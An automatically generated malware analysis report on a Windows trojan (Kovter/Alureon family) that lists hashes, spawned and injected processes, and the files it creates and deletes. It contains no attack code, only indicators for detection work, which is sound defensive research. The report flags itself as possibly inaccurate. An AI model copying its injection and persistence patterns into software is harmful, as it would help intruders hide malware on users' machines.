Trojan.Win32.Kovter.jqd (Kaspersky), Trojan.GenericKD.3142479 (AdAware), Trojan.Win32.Alureon.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: bfa0be4038c3d1ebbe7557be0cfac78c
SHA1: c6285115f1a9abac1727a4f55feae077920fb896
SHA256: c3330f66a33be8334221b6f4b8493609651a234786bdd8db9c8aa16ff971f2d1
SSDeep: 196608:X N2iXiJwxvBPyqTpMT4kgSL5e7UnowYP/j72cE1ZBn1bsalhJmnlG05oR:XzH61Bg4kt5e4nrYTSjBVsaHJmlG05oR
Size: 9304658 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-02-24 21:20:04
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
csc.exe:1992
csc.exe:888
csc.exe:444
csc.exe:1532
csc.exe:544
csc.exe:2008
csc.exe:332
csc.exe:1752
csc.exe:1512
07-04-2016_hwopt_3.0.10-1.tmp:432
MSIF2.tmp:3740
netsh.exe:652
netsh.exe:2084
InstallUtil.exe:1744
InstallUtil.exe:2024
clicker.exe:2312
clicker.exe:2452
sc.exe:716
sc.exe:588
sc.exe:2000
sc.exe:456
sc.exe:504
sc.exe:1752
WindowsXP-KB968930-x86-ENG.exe:3496
master.exe:1488
mscorsvw.exe:4020
mscorsvw.exe:3616
mscorsvw.exe:2948
mscorsvw.exe:3756
mscorsvw.exe:2196
mscorsvw.exe:3536
mscorsvw.exe:3676
mscorsvw.exe:3044
mscorsvw.exe:2544
mscorsvw.exe:2564
mscorsvw.exe:1856
mscorsvw.exe:3180
mscorsvw.exe:2660
mscorsvw.exe:2508
mscorsvw.exe:2680
mscorsvw.exe:2872
mscorsvw.exe:3832
mscorsvw.exe:3872
mscorsvw.exe:304
mscorsvw.exe:224
mscorsvw.exe:1556
mscorsvw.exe:2536
mscorsvw.exe:2000
mscorsvw.exe:2412
mscorsvw.exe:2064
wsmanhttpconfig.exe:2848
wsmanhttpconfig.exe:2452
MsiExec.exe:3168
MsiExec.exe:2812
%original file name%.exe:1328
update.exe:3572
PSCustomSetupUtil.exe:2428
PSCustomSetupUtil.exe:3452
PSCustomSetupUtil.exe:3416
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:3068
PSCustomSetupUtil.exe:3232
PSCustomSetupUtil.exe:2300
PSCustomSetupUtil.exe:2484
PSCustomSetupUtil.exe:2548
PSCustomSetupUtil.exe:3344
PSCustomSetupUtil.exe:2388
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:3664
PSCustomSetupUtil.exe:2600
PSCustomSetupUtil.exe:2876
PSCustomSetupUtil.exe:3884
PSCustomSetupUtil.exe:2284
PSCustomSetupUtil.exe:3932
PSCustomSetupUtil.exe:2976
PSCustomSetupUtil.exe:3704
PSCustomSetupUtil.exe:3544
PSCustomSetupUtil.exe:3140
PSCustomSetupUtil.exe:3784
PSCustomSetupUtil.exe:3224
PSCustomSetupUtil.exe:3984
PSCustomSetupUtil.exe:3848
regsvr32.exe:3056
regsvr32.exe:2644
summit_sharma.exe:2672
07-04-2016_hwopt_3.0.10-1.exe:1632
XBLive.exe:3008
InstallationStatsUploder_12052016001648.exe:2044
InstallationStatsUploder_12052016001648.exe:1488
InstallationStatsUploder_12052016001648.exe:580
InstallationStatsUploder_12052016001648.exe:1636
InstallationStatsUploder_12052016001648.exe:1860
InstallationStatsUploder_12052016001648.exe:1612
InstallationStatsUploder_12052016001648.exe:640
InstallationStatsUploder_12052016001648.exe:1848
InstallationStatsUploder_12052016001648.exe:508
InstallationStatsUploder_12052016001648.exe:1292
InstallationStatsUploder_12052016001648.exe:1400
EditBinx86.exe:960
EditBinx86.exe:2012
mofcomp.exe:2684
ngen.exe:332
ngen.exe:276
ngen.exe:2092
ngen.exe:3300
ngen.exe:2136
ngen.exe:3212
ngen.exe:2056
ngen.exe:3340
ngen.exe:2248
ngen.exe:3160
ngen.exe:2112
ngen.exe:2240
ngen.exe:3232
ngen.exe:444
ngen.exe:1496
ngen.exe:2188
ngen.exe:2212
ngen.exe:2276
ngen.exe:780
ngen.exe:3224
ngen.exe:2024
ngen.exe:2160
ngen.exe:2148
runonce.exe:3520
cvtres.exe:308
cvtres.exe:1968
cvtres.exe:1556
cvtres.exe:952
cvtres.exe:1064
cvtres.exe:340
cvtres.exe:164
cvtres.exe:504
cvtres.exe:364
Osman_Navigation.exe:4072
PSSetupNativeUtils.exe:968
fileman.exe:1636
mastermind.exe:3740
grpconv.exe:3484
The Trojan injects its code into the following process(es):
hwopt12052016001648_updater_service.exe:380
regsvr32.exe:2700
regsvr32.exe:2952
hwopt12052016001648.exe:912
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process csc.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (396 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (0 bytes)
The process csc.exe:888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (664 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (0 bytes)
The process csc.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (396 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (0 bytes)
The process csc.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (396 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (0 bytes)
The process csc.exe:544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (4150 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (0 bytes)
The process csc.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (4150 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (0 bytes)
The process csc.exe:332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\4p64sgqi.dll (4150 bytes)
%WinDir%\Temp\4p64sgqi.out (396 bytes)
%WinDir%\Temp\CSC13.tmp (664 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\CSC13.tmp (0 bytes)
%WinDir%\Temp\RES14.tmp (0 bytes)
The process csc.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (4150 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (0 bytes)
The process csc.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (396 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (0 bytes)
The process 07-04-2016_hwopt_3.0.10-1.tmp:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (9 bytes)
%WinDir%\hwopt_12052016001648\unins000.dat (9300 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SG5DG.tmp (5873 bytes)
%WinDir%\hwopt_12052016001648\Utils.dll (57 bytes)
%WinDir%\hwopt_12052016001648\is-JSA3M.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-39PQT.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\is-3HV2J.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-11RFO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\is-RR6J5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-QADEL.tmp (9 bytes)
%WinDir%\hwopt_12052016001648\is-NGNQK.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-KE3G3.tmp (5441 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-0GUHR.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (23 bytes)
%WinDir%\hwopt_12052016001648\is-KKUTO.tmp (3361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H19H5.tmp (18 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-4A1SP.tmp (14 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-TJDF4.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp (4 bytes)
%WinDir%\hwopt_12052016001648\addon\is-TRQBO.tmp (12287 bytes)
%WinDir%\hwopt_12052016001648\addon\is-1J7I3.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\is-7B37I.tmp (20 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-J0U8C.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-22OLL.tmp (2105 bytes)
%WinDir%\hwopt_12052016001648\is-480KO.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-37BTT.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-3PU0B.tmp (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-NUNLD.tmp (985 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-VTGNO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\is-1JNQO.tmp (25361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-B1DBC.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-SVUH5.tmp (424 bytes)
%WinDir%\hwopt_12052016001648\addon\is-FLV5J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-FCRIP.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-LKUF0.tmp (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SI3J3.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-PL8C4.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\addon\is-4S0ED.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\is-DNIFE.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\is-HP0LE.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-LS6F4.tmp (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-ADFMM.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\is-V18V5.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-5O5GC.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\is-LDP3M.tmp (2321 bytes)
%WinDir%\hwopt_12052016001648\is-2JF6C.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H96Q4.tmp (7345 bytes)
%WinDir%\hwopt_12052016001648\WinDivert.dll (18 bytes)
%WinDir%\hwopt_12052016001648\addon\is-T8IBT.tmp (7971 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (0 bytes)
The process InstallUtil.exe:1744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallLog (732 bytes)
%System%\config\SYSTEM.LOG (4777 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallState (196 bytes)
%System%\config\system (1723 bytes)
C:\$Directory (288 bytes)
%WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (672 bytes)
The process InstallUtil.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\system (2397 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallState (196 bytes)
%System%\config (288 bytes)
%System%\config\SYSTEM.LOG (4793 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallLog (876 bytes)
%WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (1311 bytes)
The process clicker.exe:2312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\b_dk.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw16.tmp (7405 bytes)
%Documents and Settings%\%current user%\Application Data\chapter.gif (7192 bytes)
%Documents and Settings%\%current user%\Application Data\1.png (234 bytes)
%Documents and Settings%\%current user%\Application Data\28.svg (1 bytes)
%Documents and Settings%\%current user%\Application Data\TerraceSawwortSouthernwood (2 bytes)
%Documents and Settings%\%current user%\Application Data\septillions.dll (6 bytes)
%Documents and Settings%\%current user%\Application Data\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\make.graphic.viewport.xml (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw15.tmp (0 bytes)
The process WindowsXP-KB968930-x86-ENG.exe:3496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\f1fab1e3e4f7fec893e8\update\update.exe (10748 bytes)
C:\f1fab1e3e4f7fec893e8\about_language_keywords.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\update (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_if.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremotemanagement.adm (574 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.dll (14450 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\f1fab1e3e4f7fec893e8\about_modules.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\update\updspapi.dll (5940 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.cmd (35 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll-help.xml (16567 bytes)
C:\f1fab1e3e4f7fec893e8\about_scripts.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_wildcards.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\f1fab1e3e4f7fec893e8\about_aliases.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_type_operators.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\registry.format.ps1xml (20 bytes)
C:\f1fab1e3e4f7fec893e8\about_try_catch_finally.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.mof (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_regular_expressions.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_methods.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.ini (1956 bytes)
C:\f1fab1e3e4f7fec893e8\types.ps1xml (2510 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.resources.dll (9 bytes)
C:\f1fab1e3e4f7fec893e8\wtrinstaller.ico (4803 bytes)
C:\f1fab1e3e4f7fec893e8\wsmprovhost.exe (657 bytes)
C:\f1fab1e3e4f7fec893e8\about_while.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_parsing.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\wsman.format.ps1xml (837 bytes)
C:\f1fab1e3e4f7fec893e8\dotnettypes.format.ps1xml (266 bytes)
C:\f1fab1e3e4f7fec893e8\about_trap.help.txt (10 bytes)
C:\$Directory (800 bytes)
C:\f1fab1e3e4f7fec893e8\about_bits_cmdlets.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\spuninst.exe (3787 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_internationalization.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.resources.dll (3153 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.exe (2526 bytes)
C:\f1fab1e3e4f7fec893e8\pssetupnativeutils.exe (9 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.dll (1842 bytes)
C:\f1fab1e3e4f7fec893e8\powershellcore.format.ps1xml (1492 bytes)
C:\f1fab1e3e4f7fec893e8\pspluginwkr.dll (1756 bytes)
C:\f1fab1e3e4f7fec893e8\powershelltrace.format.ps1xml (344 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\f1fab1e3e4f7fec893e8\about_do.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_variables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.inf (2457 bytes)
C:\f1fab1e3e4f7fec893e8\about_path_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.mof (789 bytes)
C:\f1fab1e3e4f7fec893e8\about_operators.help.txt (770 bytes)
C:\f1fab1e3e4f7fec893e8\about_reserved_words.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_parameters.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremoteshell.adm (12 bytes)
C:\f1fab1e3e4f7fec893e8\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\f1fab1e3e4f7fec893e8\about_types.ps1xml.help.txt (481 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssession_details.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_ref.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\default.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.runtime.dll (33 bytes)
C:\f1fab1e3e4f7fec893e8\about_transactions.help.txt (1011 bytes)
C:\f1fab1e3e4f7fec893e8\about_comment_based_help.help.txt (595 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssnapins.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_core_commands.help.txt (221 bytes)
C:\f1fab1e3e4f7fec893e8\eventforwarding.adm (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_format.ps1xml.help.txt (17 bytes)
C:\f1fab1e3e4f7fec893e8\about_hash_tables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshplugin.dll (802 bytes)
C:\f1fab1e3e4f7fec893e8\about_eventlogs.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\certificate.format.ps1xml (155 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\about_ws-management_cmdlets.help.txt (405 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\f1fab1e3e4f7fec893e8\importallmodules.psd1 (438 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshsip.dll (24 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_troubleshooting.help.txt (146 bytes)
C:\f1fab1e3e4f7fec893e8\wsmwmipl.dll (2816 bytes)
C:\f1fab1e3e4f7fec893e8\about_requires.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_faq.help.txt (775 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll (3386 bytes)
C:\f1fab1e3e4f7fec893e8\about_wmi_cmdlets.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_methods.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\getevent.types.ps1xml (15 bytes)
C:\f1fab1e3e4f7fec893e8\about_split.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\wsmsvc.dll (15909 bytes)
C:\f1fab1e3e4f7fec893e8\profile.ps1 (772 bytes)
C:\f1fab1e3e4f7fec893e8\about_locations.help.txt (794 bytes)
C:\f1fab1e3e4f7fec893e8\about_pipelines.help.txt (411 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshmsg.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\winrsmgr.dll (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\spcustom.dll (23 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_parameters.help.txt (962 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmpty.xsl (1 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.ver (14 bytes)
C:\f1fab1e3e4f7fec893e8\about_properties.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\about_break.help.txt (792 bytes)
C:\f1fab1e3e4f7fec893e8\about_quoting_rules.help.txt (659 bytes)
C:\f1fab1e3e4f7fec893e8\spupdsvc.exe (287 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmtxt.xsl (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\f1fab1e3e4f7fec893e8\about_redirection.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\winrs.exe (1154 bytes)
C:\f1fab1e3e4f7fec893e8\help.format.ps1xml (3947 bytes)
C:\f1fab1e3e4f7fec893e8\wsmres.dll (6164 bytes)
C:\f1fab1e3e4f7fec893e8\winrssrv.dll (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_continue.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll (5010 bytes)
C:\f1fab1e3e4f7fec893e8\about_return.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_objects.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_environment_variables.help.txt (417 bytes)
C:\f1fab1e3e4f7fec893e8\update\kb968930xp.cat (512 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_jobs.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.psd1 (950 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_requirements.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_output.help.txt (887 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_blocks.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_profiles.help.txt (457 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.resources.dll (13 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll (3118 bytes)
C:\f1fab1e3e4f7fec893e8\winrscmd.dll (2907 bytes)
C:\f1fab1e3e4f7fec893e8\about_arrays.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_signing.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_automatic_variables.help.txt (14 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll (38414 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\f1fab1e3e4f7fec893e8\spmsg.dll (495 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_ise.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_data_sections.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_providers.help.txt (59 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.resources.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_debuggers.help.txt (21 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.resources.dll (562 bytes)
C:\f1fab1e3e4f7fec893e8\pscustomsetuputil.exe (316 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.dll (591 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\f1fab1e3e4f7fec893e8\diagnostics.format.ps1xml (590 bytes)
C:\f1fab1e3e4f7fec893e8\about_logical_operators.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_line_editing.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_precedence.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\filesystem.format.ps1xml (133 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe.mui (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_session_configurations.help.txt (276 bytes)
C:\f1fab1e3e4f7fec893e8\about_prompts.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll (1145 bytes)
C:\f1fab1e3e4f7fec893e8\about_assignment_operators.help.txt (379 bytes)
C:\f1fab1e3e4f7fec893e8\$shtdwn$.req (788 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.format.ps1xml (16 bytes)
C:\f1fab1e3e4f7fec893e8\windowspowershellhelp.chm (26041 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\f1fab1e3e4f7fec893e8\about_execution_policies.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\f1fab1e3e4f7fec893e8\about_switch.help.txt (489 bytes)
C:\f1fab1e3e4f7fec893e8\about_throw.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_join.help.txt (2 bytes)
